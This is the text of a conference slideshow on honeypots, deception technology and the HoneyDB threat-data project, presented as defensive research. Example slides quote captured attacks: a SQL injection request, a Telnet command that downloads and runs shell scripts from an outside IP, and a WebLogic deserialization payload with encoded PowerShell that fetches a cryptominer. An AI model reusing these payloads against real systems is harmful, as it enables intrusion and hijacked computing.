SlideShare a Scribd company logo

Honeypots, Deception, and Frankenstein

Phillip Maddux
Phillip Maddux

Presented on May 9, 2018 at SOURCE Conference Boston (https://sourceconference.com/events/bos18/). This version contains minor updates from previous presentations. This talk will provide a quick overview honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.

Technology
1 of 75
Download to read offline
Honeypots, Deception, and Frankenstein SOURCE Boston 2018
BIO Career Summary ● WebDev, DBA, SA, IT Auditor (~7 yrs) ● AppSec in Financials, EY & GS (~9 yrs) On the socials ● Twitter: @foospidy ● Github: http://github.com/foospidy ● LinkedIn: http://linkedin.pxmx.io ● Blog: http://pxmx.io Phillip Maddux Trusted AppSec Advisor and Senior Solutions Engineer @ Signal Sciences https://signalsciences.com SOURCE Boston 2018
Agenda of the Cybers ● Honeypots 101 ● Cyber Deception ● HoneyPy - Quick Update ● Frankenstein (HoneyDB Project) ● Q&A
Honeypots 101 A networked computer configured to look like a legitimate system, but its real purpose is to discover and/or track attackers. Types of Honeypots: - Production - Research Levels of Interaction: Low Emulated services, very limited interaction, no login capability (low risk). Medium Emulated services, emulated login, emulated commands. High Actual services, system logins, and commands (very risky).
Honeypots 101 - Production Honeypots Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless… - Something is misconfigured on the network - A malicious actor on the network Production honeypots are an additional layer to your defense strategy. - Honeypot logs are low volume and high value - Honeypots introduce risk to the attacker
Honeypots 101 - Research Honeypots
Honeypots 101 - Production Honeypots Additional Layer to… Preventative controls - Network & application firewalls - Intrusion prevention systems - Patch management - Network compartmentalization - Anti-virus Detective controls - Intrusion detection systems - Network traffic analysis - Endpoint monitoring Control validation - Vulnerability scans - Audits - Penetration testing - Control performance monitoring Honeypots - Produces low volumes of data compared to the volumes of data from all other preventative and detective controls
Honeypots 101 - Research Honeypots Research honeypots can have many purposes, it just depends on what the research goals are. Examples: - Identify sources of malicious traffic - Discover active malware, botnets, and C&C servers - Learn about attacker techniques & tools
Honeypots 101 - Research Honeypots Bots Scanners Malware DDoS Botnets etc. Internet
Honeypots 101 - Research Honeypots ShmooCon 2015 Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap - Reversing malware - Uncovering c2 servers - Uncovering imminent ddos attacks Presentation video Now doing really cool stuff with… (https://greynoise.io/)
Honeypots 101 - Hobbyist Honeypots - Try it out. - It’s fun! This is not me. (this is totally me)
Cyber Deception
The First Rule of Cyber Deception
Image Source You Must Show This Image
Deception Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices. [1] 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Automation Automation for: - Deploying deception endpoints as VMs, containers, or processes. - Configuration of deception endpoints. Centralized management interface, or API driven.
Deception Lures Lures (aka breadcrumbs) - Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets. [1] - Credentials to network resources or applications. - Shortcuts to applications or other services, e.g. FTP, Telnet, SSH. - Browser artifacts, e.g. history, favorites, cookies. - Database connection strings - Network drives - etc. 1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Solutions Very fancy implementations of honeypots
Deception Layers Network services - SSH, Telnet, FTP, etc. Applications - cookies, directories, logins, functionality, etc. Data - watermarks, triggers, records access, etc.
Deception in Applications 2017 Herb Todd: Tangled Web: Defense in Deception - The goals of deception from the perspective of both the attacker and defender - The elements and processes needed to plan, prepare, execute, and monitor effective deception - The types of deception techniques that are effective and how they translate into actual web application capabilities - How to identify and respond to various types of attackers. Presentation video My takeaway - a tailored solution is needed
See, told ya.
Deception Goal Integrate deception throughout your network and applications so you become a high risk to attackers
Deception Market Approximately 20 companies Raised at least 201 million dollars Top 5 funded range 19 million to 46 million 2 acquisitions All this over the last 4, maybe 5 years Numbers based on data from crunchbase.com as of Fall 2017
Deception Challenges The concept of honeypots & deception has been around for years The Cuckoo’s Egg - 1989 Bsides Raleigh 2017 (now Bsides RDU) source
Deception Challenges Why isn’t everyone already doing deception?
Deception Challenges Maturity
Deception Challenges Over the last 10 to 15 years organizations have focused on getting the basics done… ● Vulnerability Assessment ● Patch Management ● Endpoint protection ● Network Monitoring (IDS/IPS) ● Controls Validation ● Security awareness / training Deception ● No resources ● Not a priority ● Not fully understood
Deception Challenges However, as organizations are becoming more mature in their security programs they are now thinking about deception… What does a deception program look like for their organization?
Deception Program Initial thoughts… ● Scope… intruder vs. insider, or both? ● Output... alerts vs. counter intelligence, or both? ● Coverage… external vs. internal, or both? ● Assets… network, applications, data? ● Validation… metrics and testing. ● Incident response… integration and prioritization. Audit & Compliance?
Deception Challenges Some other challenges… ● Some existing solutions are heavy/complex to deploy (also operational risk). ● Lures & breadcrumb management. ● Vulnerability scans reporting on sensors. ● Deception data risk (data is fake, incident is real). ● External facing deception can have an impact on security scorecard. ● How to implement deception in 3rd party vendor environments.
Deception Takeaways Get the basics covered first Think about your deception story (program) Investigate solutions that are right sized for your organization’s maturity level A solution needs to: - have capability to be tailored - be easy to deploy - be easy to automate and integrate - be light weight / low touch to manage
Deception Takeaways Effective Deception
Project Updates
HoneyPy - Low to medium interaction honeypot. - Plugin based to implement various network services (tcp or udp). - Open source, on Github https://github.com/foospidy/HoneyPy - Written in Python. - Plugins - https://github.com/foospidy/HoneyPy/tree/master/plugins - Service config - https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg - Integrations (loggers) - https://github.com/foospidy/HoneyPy/tree/master/loggers
HoneyDB HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs. honeydb.io (redirects to riskdiscovery.com/honeydb)
HoneyDB - Features Data visualization…
HoneyDB - Features Investigation…
HoneyDB - Features Threat Information - Bad-hosts - Sensor Data - Twitter Threat Feed
HoneyDB How does it work?
HoneyDB - Original Architecture Web API
HoneyDB - Scale Problem Web API
HoneyDB - Reliability Problem Fun reading… http://www.cloudatacost.com/mystory https://www.reddit.com/r/CloudAtCost/
HoneyDB - $$$? Decent web servers and data storage could run about $400-$500 per month. Current 90 day storage 50 GB
HoneyDB - How To Get $$$? Idea… Honeypots As A Service (HaaS)
HoneyDB - How To Get $$$? Idea… Honeypots As A Service (HaaS)
HoneyDB - You Have To HaaS it! Attempt a demo.
HoneyDB - Turns Out… You Don’t Have To HaaS it! Or nobody wants to HaaS it =(
HoneyDB - But Wait, CarolinaCon Connection! http://novcon.net/ Offered VMs for free! btw… they also operate the threat info project.
HoneyDB - Reliable Servers But still need to scale
HoneyDB - Frankenstein
HoneyDB - Frankenstein Cloud Architecture “Frankenstein scaaaaaaaaaaaaale” - Frankenstein
HoneyDB - Frankenstein Cloud Architecture
HoneyDB - Frankenstein Cloud Architecture Serverless (functions) Google Cloud BigQuery PubSub Novcon VMs Honeydb web / api MySQL (Secondary) MySQL (Primary) get hmac post events post eventspull events pull tweets Redis - API Request Limiting replicate query inserts stream events Coming soon
HoneyDB - What about... Blockchain?
HoneyDB - Blockchain? Not yet.
HoneyDB - Note On Serverless Functions IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost. AWS Lambda is good - robust, but expensive… API gateway charges. Google Cloud Functions is disappointing - easy to deploy, only nodejs, but… Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why? Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
HoneyDB - Ok, So What Does It Cost?
HoneyDB - Ok, So What Does It Cost?
HoneyDB - How To Money? Cryptocurrency Mining...
HoneyDB - How To Money? Not practical, but wrote a cool script... HoneyMiner https://github.com/foospidy/HoneyMiner
HoneyDB - How To Money? Masternodes… Greater privacy of transactions Performing immediate transactions Participation in proceedings and voting Activate budgeting and cashier system in cryptocurrencies
HoneyDB - How To Money? Currently running 5 masternodes across 2 VPS Yields about $100 to $200 per month.
HoneyDB - But that crypto though. Masternodes have potential, but requires an initial investment, and at the mercy of market volatility.
HoneyDB - How to money? Other options… Sponsorships Commercial Licensing
HoneyDB - Back To HaaS Tools to get you honeypotting ● Honeydb-agent ○ Like HoneyPy, but a binary ● API Endpoints ● HoneyDB CLI
HoneyDB - New API Client Wrapper and CLI pip install honeydb usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty] optional arguments: -h, --help show this help message and exit --bad-hosts Get bad hosts. --sensor-data-count Get sensor data count. --sensor-data Get sensor data. --threatbin Get ThreatBin entries. --twitter-threat-feed Get Twitter Threat Feed. --mydata Filter on mydata. --date DATE Date in format YYYY-MM-DD --ip-address IP_ADDRESS IP address to filter on. --from-id FROM_ID ID to continue retrieving sensor data. --pretty Print JSON in pretty format.
HoneyDB - CLI/API Attempt a demo.
HoneyDB - Examples... Web GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR (45,120,50,45,81,45)--%20%20 HTTP/1.1 Host: x.x.x.x Accept: */* Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
HoneyDB - Examples... POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 64.137.163.142:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 Connection: Close Content-Type: text/xml Content-Length: 1216 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd.exe</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4 AcABoAHAAJwApADsA</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header>
HoneyDB - Examples... $.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W .C.=.N.e.w.-.O.b.j.e.c.t. .N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s .e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0. .$.O.S.".).;.I.E.X. .$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9 ...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
HoneyDB - @MalwareMechanic ● I analyzed the initial POST you sent me. From there was I was able to pull apart a scanner/worm/RAT! ● It appears to be GhostMiner to mine Monero!
HoneyDB - Hmmmmm... $ cat GhostMiner >> HoneyMiner
HoneyDB - No no no no...
HoneyDB - @MalwareMechanic ● This POST utilizes a Java deserialization vulnerability to execute a base64 encoded PowerShell command. ● This in turn downloads and executes a PowerShell script (hxxp://123.59.68.172/Cache/DL.php). ● Installs a cryptominer via WMI. ● Attempts to stop the various services & tasks before installing the new miner. ● Attempts to stop other miners. ● Attempts to stop processes listening on specific ports. ● Also saw references to powershell_reflective_mimikatz.
HoneyDB - Go Forth and Honeypot! honeydb.io Thanks! Questions?

Recommended

Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinPhillip Maddux
 
Introduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeIntroduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeMelbourne IT
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonSSIMeetup
 
Meletis Belsis -CSIRTs
Meletis Belsis -CSIRTsMeletis Belsis -CSIRTs
Meletis Belsis -CSIRTsMeletis Belsis MPhil/MRes/BSc
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceHITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceJohn Bambenek
 

Recommended

Honeypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinHoneypots, Deception, and Frankenstein
Honeypots, Deception, and FrankensteinPhillip Maddux
 
Introduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeIntroduction to the Current Threat Landscape
Introduction to the Current Threat LandscapeMelbourne IT
 
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptx
[HITCON 2020 CTI Village] Threat Hunting and Campaign Tracking Workshop.pptxChi En (Ashley) Shen
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonSSIMeetup
 
Meletis Belsis -CSIRTs
Meletis Belsis -CSIRTsMeletis Belsis -CSIRTs
Meletis Belsis -CSIRTsMeletis Belsis MPhil/MRes/BSc
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
ANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleANALYZE'15 - Bulk Malware Analysis at Scale
ANALYZE'15 - Bulk Malware Analysis at ScaleJohn Bambenek
 
HITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceHITCON 2015 - DGAs, DNS and Threat Intelligence
HITCON 2015 - DGAs, DNS and Threat IntelligenceJohn Bambenek
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
Operationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsOperationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsThreatConnect
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligencePriyanka Aash
 
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Vaticle
 
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Chi En (Ashley) Shen
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Global Cyber Threat Intelligence
Global Cyber Threat IntelligenceGlobal Cyber Threat Intelligence
Global Cyber Threat IntelligenceNTT Innovation Institute Inc.
 
Threat Modeling In 2021
Threat Modeling In 2021Threat Modeling In 2021
Threat Modeling In 2021Adam Shostack
 
Zero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationZero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationClare Nelson, CISSP, CIPP-E
 
IOCs Are Dead—Long Live IOCs!
IOCs Are Dead—Long Live IOCs!IOCs Are Dead—Long Live IOCs!
IOCs Are Dead—Long Live IOCs!Priyanka Aash
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Clare Nelson, CISSP, CIPP-E
 
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...Clare Nelson, CISSP, CIPP-E
 
Evolution of-ai-bots-for-real-time-adaptive-security
Evolution of-ai-bots-for-real-time-adaptive-securityEvolution of-ai-bots-for-real-time-adaptive-security
Evolution of-ai-bots-for-real-time-adaptive-securityDESMOND YUEN
 
CTI ANT: Hunting for Chinese Threat Intelligence
CTI ANT: Hunting for Chinese Threat IntelligenceCTI ANT: Hunting for Chinese Threat Intelligence
CTI ANT: Hunting for Chinese Threat IntelligenceJacklynTsai
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant abnmi
 
Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Deception in Cyber Security (League of Women in Cyber Security)
Deception in Cyber Security (League of Women in Cyber Security)Phillip Maddux
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secureEoin Keary
 

More Related Content

What's hot

Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
Operationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsOperationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsThreatConnect
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligencePriyanka Aash
 
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Vaticle
 
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Chi En (Ashley) Shen
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Threat Modeling In 2021
Threat Modeling In 2021Threat Modeling In 2021
Threat Modeling In 2021Adam Shostack
 
Zero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationZero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationClare Nelson, CISSP, CIPP-E
 
IOCs Are Dead—Long Live IOCs!
IOCs Are Dead—Long Live IOCs!IOCs Are Dead—Long Live IOCs!
IOCs Are Dead—Long Live IOCs!Priyanka Aash
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...EC-Council
 
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Clare Nelson, CISSP, CIPP-E
 
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...Clare Nelson, CISSP, CIPP-E
 
Evolution of-ai-bots-for-real-time-adaptive-security
Evolution of-ai-bots-for-real-time-adaptive-securityEvolution of-ai-bots-for-real-time-adaptive-security
Evolution of-ai-bots-for-real-time-adaptive-securityDESMOND YUEN
 
CTI ANT: Hunting for Chinese Threat Intelligence
CTI ANT: Hunting for Chinese Threat IntelligenceCTI ANT: Hunting for Chinese Threat Intelligence
CTI ANT: Hunting for Chinese Threat IntelligenceJacklynTsai
 
So... you want to be a security consultant
So... you want to be a security consultant So... you want to be a security consultant
So... you want to be a security consultant abnmi
 

What's hot (20)

Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
 
Operationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsOperationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent Actors
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
 
Dreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat IntelligenceDreaming of IoCs Adding Time Context to Threat Intelligence
Dreaming of IoCs Adding Time Context to Threat Intelligence
 
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
Building a Cyber Threat Intelligence Knowledge Management System (Paris Augus...
 
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
Catching the Golden Snitch- Leveraging Threat Intelligence Platforms to Defen...
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Global Cyber Threat Intelligence
Global Cyber Threat IntelligenceGlobal Cyber Threat Intelligence
Global Cyber Threat Intelligence
 
Threat Modeling In 2021
Threat Modeling In 2021Threat Modeling In 2021
Threat Modeling In 2021
 
Zero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationZero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and Authentication
 
IOCs Are Dead—Long Live IOCs!
IOCs Are Dead—Long Live IOCs!IOCs Are Dead—Long Live IOCs!
IOCs Are Dead—Long Live IOCs!
 
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
Finding the Sweet Spot: Counter Honeypot Operations (CHOps) by Jonathan Creek...
 
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?Texas Bitcoin Conference: Are Privacy Coins Private Enough?
Texas Bitcoin Conference: Are Privacy Coins Private Enough?
 
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
Privacy-Preserving Authentication, Another Reason to Care about Zero-Knowledg...
 
Evolution of-ai-bots-for-real-time-adaptive-security
Evolution of-ai-bots-for-real-time-adaptive-securityEvolution of-ai-bots-for-real-time-adaptive-security
Evolution of-ai-bots-for-real-time-adaptive-security
